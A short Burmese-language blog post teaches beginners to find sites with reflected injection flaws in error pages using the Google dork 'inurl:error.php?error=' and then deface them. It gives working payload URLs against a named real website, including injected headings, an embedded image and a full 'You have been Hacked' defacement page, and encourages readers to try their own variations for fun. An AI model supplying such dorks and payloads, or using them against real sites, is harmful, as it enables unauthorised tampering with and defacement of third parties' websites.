Error Page ကို ယူျပီး xss injection ထုိးတဲ့နည္းေလး တစ္မ်ဳိးပါဘဲ..
Website Hacking ေလ့လာစ သူတစ္ဦးအတြက္ကေတာ့ xss ဆုိတာအလြယ္ဆုံး Hack နညး္တစ္မ်ဳိးပါဘဲ။. .. Funny အျဖစ္လညး္ပာက္နုိင္သလို... မိမိ စိတ္ေပၚမူတည္ျပီး မ်ားစြာ ျပဳ ့လုပ္နုိင္တဲ့နည္းေလးဆုိလညး္မမ်ားပါဘူး။
Dork: "inurl:error.php?error="
Dork ကိုအသုံးျပဳ ့ၾကည့္ပါ website ေတြမ်ားစြာ က်လာပါလိမ့္မယ္...
အဲ ့တည္းကမွ someone.com/error.php?error=someon ဆုိတာကိုေ၇ြးရမွာျဖစ္ပါတယ္
Someone ဆုိတဲ့ေနရာမွာကေတာ့ အမ်ဳိးမ်ဳိးကြဲျပားနုိင္ပါတယ္...
ဥပမာ ဆုိဒ္ေလး တစ္ခုနဲ ့အေပ်ာ္ေလးေတြစလုိက္ရေအာင္လားဗ်ာ...
http://www.sacareerfocus.co.za/error.php?error=You%20need%20to%20login%20to%20see%20this%20page.
ဘဲဆုိၾကပါစုိ ့ဗ်ာ... error.php?error= ဆုိတဲ့ေနာက္ပာာေတြအကုန္ျဖတ္ျပီး ေအာက္ကနည္းလမ္းေလးေတြနဲ ့ကစားၾကည့္ရေအာင္...
မထမဦးဆုံး အေျခ ခံကုဒ္ေလးစသြင္းပါမယ္...
http://www.sacareerfocus.co.za/error.php?error=<h1>Hack By MSYS </h1>
ဆုိတာေလးကိုစထည့္ၾကည့္ပါ ... MSYS ေနရာမွာၾကုိက္တာထည့္ၾကည္ေပ့ါဗ်ာ..
ကဲ ေကာင္းျပီေနာက္တစ္ဆင့္အေနနဲ ့ Photo ဖုိင္ တြဲျပီး စမ္းၾကမယ္ဗ်ာ..
http://www.sacareerfocus.co.za/error.php?error=<img src="https://lh4.googleusercontent.com/-QcJLN2nn7Cs/UGVtpRUdJTI/AAAAAAAAACo/jaJl7hPbgXE/s562/is.gif"/>
ထည့္ၾကည့္ပါအုံးဗ်ာ....
ကဲေကာင္းျပီး Deface တစ္ခုစတင္ လုပ္ၾကတာေပ့ါ..
http://www.sacareerfocus.co.za/error.php?error=<title>Hacked</title><center><h1>Hacked<h1><body bgcolor="red"/><p><b>You have been Hacked<br></b></p><img src="https://lh4.googleusercontent.com/-QcJLN2nn7Cs/UGVtpRUdJTI/AAAAAAAAACo/jaJl7hPbgXE/s562/is.gif"><marquee><b>www.minsoeyarsar.com</b></marquee>
ကဲကုဒ္ေတြကို အစားသြင္းၾကည့္လုိက္ပါအုံး....
အားလုံးပာာ HTML နဲ ့ေရးသြားတာေတြပါ သင္အေတြးနဲ ့သင္ျပင္ဆင္ပါ..ေလ့လာပါ ..စမ္းသပ္ပါ..
ဥာဏ္၇ွိသလုိ ျပဳ ့လုပ္နုိင္ပါေသးတယ္... အားလုံးဘဲ ေပ်ာ္၇ြင္ၾကပါေစဗ်ာ..
0 comments:
Post a Comment